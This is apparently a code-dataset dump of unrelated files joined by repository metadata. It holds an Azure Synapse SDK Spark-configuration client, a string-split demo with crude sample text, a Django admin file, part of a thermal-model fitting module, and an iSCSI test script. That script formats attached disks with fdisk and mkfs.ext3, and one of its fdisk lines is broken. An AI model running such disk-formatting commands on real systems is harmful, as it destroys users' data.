"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="DELETE", url=_url, params=_params, headers=_headers, **kwargs)
def build_rename_spark_configuration_request(spark_configuration_name: str, **kwargs: Any) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/sparkconfigurations/{sparkConfigurationName}/rename")
path_format_arguments = {
"sparkConfigurationName": _SERIALIZER.url("spark_configuration_name", spark_configuration_name, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
if content_type is not None:
_headers["Content-Type"] = _SERIALIZER.header("content_type", content_type, "str")
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="POST", url=_url, params=_params, headers=_headers, **kwargs)
class SparkConfigurationOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.synapse.artifacts.ArtifactsClient`'s
:attr:`spark_configuration` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get_spark_configurations_by_workspace(self, **kwargs: Any) -> Iterable["_models.SparkConfigurationResource"]:
"""Lists sparkconfigurations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SparkConfigurationResource or the result of
cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.SparkConfigurationListResponse] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_spark_configurations_by_workspace_request(
api_version=api_version,
template_url=self.get_spark_configurations_by_workspace.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = HttpRequest("GET", next_link)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("SparkConfigurationListResponse", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
return pipeline_response
return ItemPaged(get_next, extract_data)
get_spark_configurations_by_workspace.metadata = {"url": "/sparkconfigurations"}
def _create_or_update_spark_configuration_initial(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
_spark_configuration = _models.SparkConfigurationResource(properties=properties)
_json = self._serialize.body(_spark_configuration, "SparkConfigurationResource")
request = build_create_or_update_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_match=if_match,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._create_or_update_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_create_or_update_spark_configuration(
self,
spark_configuration_name: str,
properties: _models.SparkConfiguration,
if_match: Optional[str] = None,
**kwargs: Any
) -> LROPoller[_models.SparkConfigurationResource]:
"""Creates or updates a sparkconfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param properties: Properties of Spark Configuration. Required.
:type properties: ~azure.synapse.artifacts.models.SparkConfiguration
:param if_match: ETag of the sparkConfiguration entity. Should only be specified for update,
for which it should match existing entity or can be * for unconditional update. Default value
is None.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either SparkConfigurationResource or the result
of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.synapse.artifacts.models.SparkConfigurationResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[_models.SparkConfigurationResource] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._create_or_update_spark_configuration_initial(
spark_configuration_name=spark_configuration_name,
properties=properties,
if_match=if_match,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_create_or_update_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def get_spark_configuration(
self, spark_configuration_name: str, if_none_match: Optional[str] = None, **kwargs: Any
) -> Optional[_models.SparkConfigurationResource]:
"""Gets a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param if_none_match: ETag of the sparkConfiguration entity. Should only be specified for get.
If the ETag matches the existing entity tag, or if * was provided, then no content will be
returned. Default value is None.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SparkConfigurationResource or None or the result of cls(response)
:rtype: ~azure.synapse.artifacts.models.SparkConfigurationResource or None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[Optional[_models.SparkConfigurationResource]] = kwargs.pop("cls", None)
request = build_get_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
if_none_match=if_none_match,
api_version=api_version,
template_url=self.get_spark_configuration.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 304]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("SparkConfigurationResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _delete_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
request = build_delete_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
template_url=self._delete_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_delete_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
@distributed_trace
def begin_delete_spark_configuration(self, spark_configuration_name: str, **kwargs: Any) -> LROPoller[None]:
"""Deletes a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._delete_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}"}
def _rename_spark_configuration_initial( # pylint: disable=inconsistent-return-statements
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> None:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
_request = _models.ArtifactRenameRequest(new_name=new_name)
_json = self._serialize.body(_request, "ArtifactRenameRequest")
request = build_rename_spark_configuration_request(
spark_configuration_name=spark_configuration_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self._rename_spark_configuration_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
_rename_spark_configuration_initial.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
@distributed_trace
def begin_rename_spark_configuration(
self, spark_configuration_name: str, new_name: Optional[str] = None, **kwargs: Any
) -> LROPoller[None]:
"""Renames a sparkConfiguration.
:param spark_configuration_name: The spark Configuration name. Required.
:type spark_configuration_name: str
:param new_name: New name of the artifact. Default value is None.
:type new_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be LROBasePolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
content_type: str = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json"))
cls: ClsType[None] = kwargs.pop("cls", None)
polling: Union[bool, PollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = self._rename_spark_configuration_initial( # type: ignore
spark_configuration_name=spark_configuration_name,
new_name=new_name,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
"endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, "str", skip_quote=True),
}
if polling is True:
polling_method: PollingMethod = cast(
PollingMethod, LROBasePolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
)
elif polling is False:
polling_method = cast(PollingMethod, NoPolling())
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_rename_spark_configuration.metadata = {"url": "/sparkconfigurations/{sparkConfigurationName}/rename"}
|
[
"noreply@github.com"
] |
fangchen0601.noreply@github.com
|
04a4e80f246a131d68d2616fcf175a178c694d71
|
d87d83049f28da72278ca9aa14986db859b6c6d6
|
/basic/coreFundamental/split_And_Join_And_strip/splitDemo.py
|
91db33efa0f6d30926f416fb183b4cd31e8ff63d
|
[] |
no_license
|
MonadWizard/python-basic
|
6507c93dc2975d6450be27d08fb219a3fd80ed64
|
624f393fcd19aeeebc35b4c2225bb2fe8487db39
|
refs/heads/master
| 2021-07-21T16:12:58.251456
| 2020-10-12T19:46:21
| 2020-10-12T19:46:21
| 223,625,523
| 1
| 0
| null | 2019-11-23T18:01:43
| 2019-11-23T17:14:21
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,046
|
py
|
s = 'this is a string of words'
print(s.split())
print("""
""")
print('That is also a string'.split())
print("""
""")
print(s.split('i'))
print("""
""")
words = s.split()
print(words)
for w in words:
print(w)
# rsplit
demo = "this is a fucked up"
rsplitee = demo.rsplit(sep=" ", maxsplit=2)
print(rsplitee)
# lsplit
demo = "this is a fucked up"
lsplitee = demo.split(sep=" ", maxsplit=2)
print(lsplitee)
# splitlines split in \n
demo = "this is a fucked up\nfucking univers"
nsplitee = demo.splitlines()
print(nsplitee)
# test
file = """mtv films election, a high school comedy, is a current example
from there, director steven spielberg wastes no time, taking us into the water on a midnight swim
"""
file_split = file.splitlines()
# Print file_split
print(file_split)
# Complete for-loop to split by commas
for substring in file_split:
substring_split = substring.split(",")
print(substring_split)
|
[
"monad.wizar.r@gmail.com"
] |
monad.wizar.r@gmail.com
|
b799cd1b2094b8b6d385a69a3678787901adbe06
|
471e1738186b51373aa73057d91bbdb2575be6d6
|
/anuario/pesquisador/admin.py
|
fd6fa9091a51a4000f772d4e4fb55386e31f74a4
|
[] |
no_license
|
pixies/portal-anuario-pesquisa
|
1939c074ba9a70d715c0c48b07741364161a77b8
|
38873ec820ac75977ba2f989b1a472e1b9c62a4a
|
refs/heads/master
| 2021-01-12T17:49:37.337465
| 2016-09-29T17:10:05
| 2016-09-29T17:10:05
| 69,398,984
| 0
| 0
| null | 2016-09-27T21:11:15
| 2016-09-27T21:11:15
| null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
from django.contrib import admin
from .models import Pesquisador, Curso, Instituicao
# Register your models here.
admin.site.register(Pesquisador)
#admin.site.register(Curso)
#admin.site.register(Instituicao)
|
[
"eu@cflb.co"
] |
eu@cflb.co
|
d1877db7913e58c396ec934ebb1dc1c993bcbbb5
|
892dd32ee0be7135cd33c875b06dcc66307dcc99
|
/automation/MPTS/verifyIqn.py
|
b82a09a932deb898ea00bc911d3867e80a4c52da
|
[] |
no_license
|
cloudbytestorage/devops
|
6d21ed0afd752bdde8cefa448d4433b435493ffa
|
b18193b08ba3d6538277ba48253c29d6a96b0b4a
|
refs/heads/master
| 2020-05-29T08:48:34.489204
| 2018-01-03T09:28:53
| 2018-01-03T09:28:53
| 68,889,307
| 4
| 8
| null | 2017-11-30T08:11:39
| 2016-09-22T05:53:44
|
Python
|
UTF-8
|
Python
| false
| false
| 5,429
|
py
|
import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' (device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
|
[
"karthik.s@cloudbyte.com"
] |
karthik.s@cloudbyte.com
|
8e1418e4e26d871472531d0c334592b6736bee75
|
07f37b31c48ae80d32831fe6eb3f58b2e9f9a0f0
|
/tpcfit/models.py
|
872bf6829ff506949e0289d4396550c3a78be115
|
[] |
no_license
|
hjosullivan/CMEEProject
|
2dcf970f2be47b43c81b78ac9dc754ef96199663
|
ee3dc452d9d61734f41eff94e2f4d0d896ed0cbe
|
refs/heads/master
| 2022-08-26T12:49:52.615471
| 2019-08-29T14:31:41
| 2019-08-29T14:31:41
| 160,700,900
| 0
| 0
| null | 2022-08-23T17:33:45
| 2018-12-06T16:20:56
|
Python
|
UTF-8
|
Python
| false
| false
| 18,125
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" models.py contains all available mathematical models to be fitted to thermal performance curves.
NOTE: Currently only Sharpe-Schoolfield variants """
import numpy as np
from lmfit import minimize, Minimizer, Parameters
class ThermalModelsException(Exception):
""" General purpose exception generator for ThermalModels"""
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return "{}".format(self.msg)
class ThermalModels(object):
""" Class containing thermal models for fitting """
# Set some useful class variables
# Bolzmann's constant
k = 8.617 * 10 ** (-5)
# Reference temperature (20 degrees C)
Tref = 283.15
# Set some useful error messages
_err_novals = ("Please supply input data for model fitting.")
_err_nonparam = ("Supplied parameters must be an instance of lmfit.parameter.Parameter or tpcfit.starting_parameters.StartParams")
_err_temperror = ("Temperature vector must be of type numpy.ndarray.")
_err_traiterror = ("Trait vector must be of type numpy.ndarray.")
_err_zero_neg_vals = ("Zero or negative values not accepted. Please supply positive values only.")
def __init__(self, temps=None, traits=None, fit_pars=None):
if temps is not None:
self.temps = temps
if not isinstance(temps, np.ndarray):
raise ThermalModelsException(self._err_temperror)
if self.temps is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.temps) < 0:
raise ThermalModelsException(self._err_temperror)
if traits is not None:
self.traits = traits
if not isinstance(traits, np.ndarray):
raise ThermalModelsException(self._err_traiterror)
if self.traits is None:
raise ThermalModelsException(self._err_novals)
elif np.min(self.traits) < 0:
raise ThermalModelsException(self._err_traiterror)
if fit_pars is not None:
self.fit_pars = fit_pars
if not isinstance(fit_pars, Parameters):
self.fit_pars = self.fit_pars.gauss_params
#raise ThermalModelsException(self._err_nonparam)
elif self.fit_pars is None:
raise ThermalModelsException(self._err_novals)
@classmethod
def set_Tref(cls, Tref_val):
""" Allow user to set their own reference temperature """
cls.Tref = Tref_val
class SharpeSchoolfieldFull(ThermalModels):
model_name = "sharpeschoolfull"
def __init__(self, temps, traits, fit_pars):
super().__init__(temps, traits, fit_pars)
self.ssf_model = self.fit_ssf(temps, traits, fit_pars)
if self.ssf_model is not None:
# Return fitted trait values
self.ssf_fits = self.ssf_fitted_vals(self.ssf_model)
# Return parameter estimates from the model
self.final_estimates = self.ssf_estimates(self.ssf_model)
# Return initial parameter values supplied to the model
self.initial_params = self.ssf_init_params(self.ssf_model)
# Return AIC score
self.AIC = self.ssf_aic(self.ssf_model)
def ssf_fcn2min(self, temps, traits, fit_pars):
""" Function to be minimized
Parameters
----------
temps: numpy array
Temperature array in Kelvin
traits: numpy array
Trait array
params: lmfit.parameter.Parameters
Dictionary of parameters to fit full schoolfield model
Returns
-------
ssf_fcn2min: callable
Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data)
"""
# Set parameter values
B0 = self.fit_pars["B0"].value
E = self.fit_pars["E"].value
Eh = self.fit_pars["Eh"].value
El = self.fit_pars["El"].value
Th = self.fit_pars["Th"].value
Tl = self.fit_pars["Tl"].value
# Eh must be greater than Eh
if E >= Eh:
return 1e10
# TH must be greater than Tl
if Th < (Tl + 1):
Th = Tl + 1
# And Tl must be less than Th
if Tl > Th - 1:
Tl = Th - 1
model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / ((1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps))))) + (np.exp(1)**((Eh / self.k) * ((1 / Th) - (1 / self.temps))))))
# Return residual array
return np.array(np.exp(model) - self.traits)
def ssf_fitted_vals(self, ssf_model):
""" Called by a fit model only: A function to estimate the trait value at a given temperature according
